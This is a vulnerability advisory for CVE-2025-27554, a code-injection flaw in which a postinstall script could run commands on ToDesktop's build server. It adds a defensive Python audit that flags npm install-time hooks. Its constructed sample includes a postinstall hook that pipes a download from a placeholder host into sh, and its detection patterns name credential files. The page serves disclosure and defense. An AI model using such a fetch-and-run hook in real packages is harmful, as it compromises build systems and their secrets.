PT-2025-9155 · Cursor+1

T/Axyz3Va

Published 2025-03-01 · Updated 2025-04-08 · CVE-2025-27554

CVSS v3.1: 9.9 (Critical)
Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: ToDesktop versions prior to 2024-10-03
Description: The issue allows remote attackers to execute arbitrary commands on the build server via a postinstall script in package.json, potentially reading secrets from the desktopify config.prod.json file and deploying updates to any app. No exploitation occurred. The vulnerability is related to improper control of generation of code, also known as 'Code Injection'.
Recommendations: For ToDesktop versions prior to 2024-10-03, update to a version released on or after 2024-10-03 to prevent potential attacks. If updating is not immediately possible, restrict access to the postinstall script in package.json as a temporary workaround, and avoid using the vulnerable postinstall script in the affected package.json until the issue is resolved.
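The description above rests on one mechanism: a build service that runs `npm install` on a customer's package also runs that package's install-time lifecycle scripts with the service's own privileges. A defender reviewing a build pipeline wants to know, before the build runs, which such hooks a package.json declares and whether they look like a build step or something else. The following audit is an added example for this page, not ToDesktop's or Cursor's code; the package.json content, the allow-list and the heuristic patterns are constructed for illustration, and `example.invalid` is a placeholder host.

```python
"""
Audit a package.json for npm lifecycle scripts that run automatically at
install time (preinstall, install, postinstall, prepare, ...). On a build
server that installs untrusted packages, every one of these hooks executes
with the build service's privileges, so each one should be allow-listed
explicitly or the install should run with `npm ci --ignore-scripts`.

Added example for this advisory page; not the vendor's code.
"""
from __future__ import annotations

import json
import re

# Script names npm runs on its own during `npm install` / `npm publish`
# (see `npm help scripts`). A developer never types these, which is what
# makes them a supply-chain foothold.
INSTALL_TIME_HOOKS = (
    "preinstall", "install", "postinstall",
    "prepublish", "preprepare", "prepare", "postprepare",
)

# Triage heuristics for the hook command. These flag behaviour worth a
# human look (fetching from the network, piping a download into an
# interpreter, touching credential files, reading the environment); they
# are not a proof of malice and a clean result is not a proof of safety.
SUSPICIOUS_PATTERNS = {
    "network fetch": re.compile(r"\b(curl|wget|fetch)\b"),
    "pipe to shell": re.compile(r"(curl|wget)[^|]*\|\s*(sh|bash|node)\b"),
    "secrets file": re.compile(r"\.env\b|\.npmrc\b|config\.prod\.json"),
    "environment access": re.compile(r"\benv\b|printenv|process\.env"),
}

# Constructed sample: one benign hook (husky) and one that downloads and
# runs a remote script during install. Not taken from any real package.
CONSTRUCTED_PACKAGE_JSON = """{
  "name": "example-desktop-app",
  "version": "1.0.0",
  "scripts": {
    "build": "vite build",
    "prepare": "husky install",
    "postinstall": "curl -fsSL https://example.invalid/setup.sh | sh"
  }
}"""


def find_install_hooks(package_json_text: str) -> dict[str, str]:
    """Return {script_name: command} for every install-time hook declared."""
    try:
        pkg = json.loads(package_json_text)
    except json.JSONDecodeError as exc:
        raise ValueError(f"package.json is not valid JSON: {exc}") from exc
    scripts = pkg.get("scripts") or {}
    if not isinstance(scripts, dict):
        raise ValueError('"scripts" must be a JSON object')
    return {name: str(cmd) for name, cmd in scripts.items()
            if name in INSTALL_TIME_HOOKS}


def triage_hooks(hooks: dict[str, str]) -> dict[str, list[str]]:
    """Map each hook name to the list of heuristic labels its command matches."""
    return {
        name: [label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(cmd)]
        for name, cmd in hooks.items()
    }


def audit(package_json_text: str,
          allow_hooks: frozenset[str] = frozenset()) -> tuple[bool, list[str]]:
    """Gate a build on the package's install-time hooks.

    Passes only when every declared hook is on the caller's allow-list and
    matches none of the triage heuristics. Returns (passed, messages).
    """
    hooks = find_install_hooks(package_json_text)
    findings = triage_hooks(hooks)
    messages: list[str] = []
    passed = True
    for name, cmd in hooks.items():
        flags = findings[name]
        if name in allow_hooks and not flags:
            messages.append(f"allowed hook {name!r}: {cmd}")
            continue
        passed = False
        reason = ", ".join(flags) if flags else "not on allow-list"
        messages.append(f"BLOCK hook {name!r} ({reason}): {cmd}")
    if not hooks:
        messages.append("no install-time lifecycle scripts found")
    return passed, messages


if __name__ == "__main__":
    ok, report = audit(CONSTRUCTED_PACKAGE_JSON, allow_hooks=frozenset({"prepare"}))
    for line in report:
        print(line)
    print("build may proceed" if ok else "build blocked: review hooks above")
```

The gate is deliberately fail-closed: an install-time hook that nobody has reviewed blocks the build even when it matches no heuristic, because the heuristics only prioritise review, they do not establish that a command is harmless. Running the install itself with `npm ci --ignore-scripts` and invoking the build script explicitly removes the automatic execution path altogether and is the stronger control where the pipeline allows it.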

Fix

Weakness Enumeration: Code Injection

Related Identifiers: CVE-2025-27554

Affected Products: Cursor, ToDesktop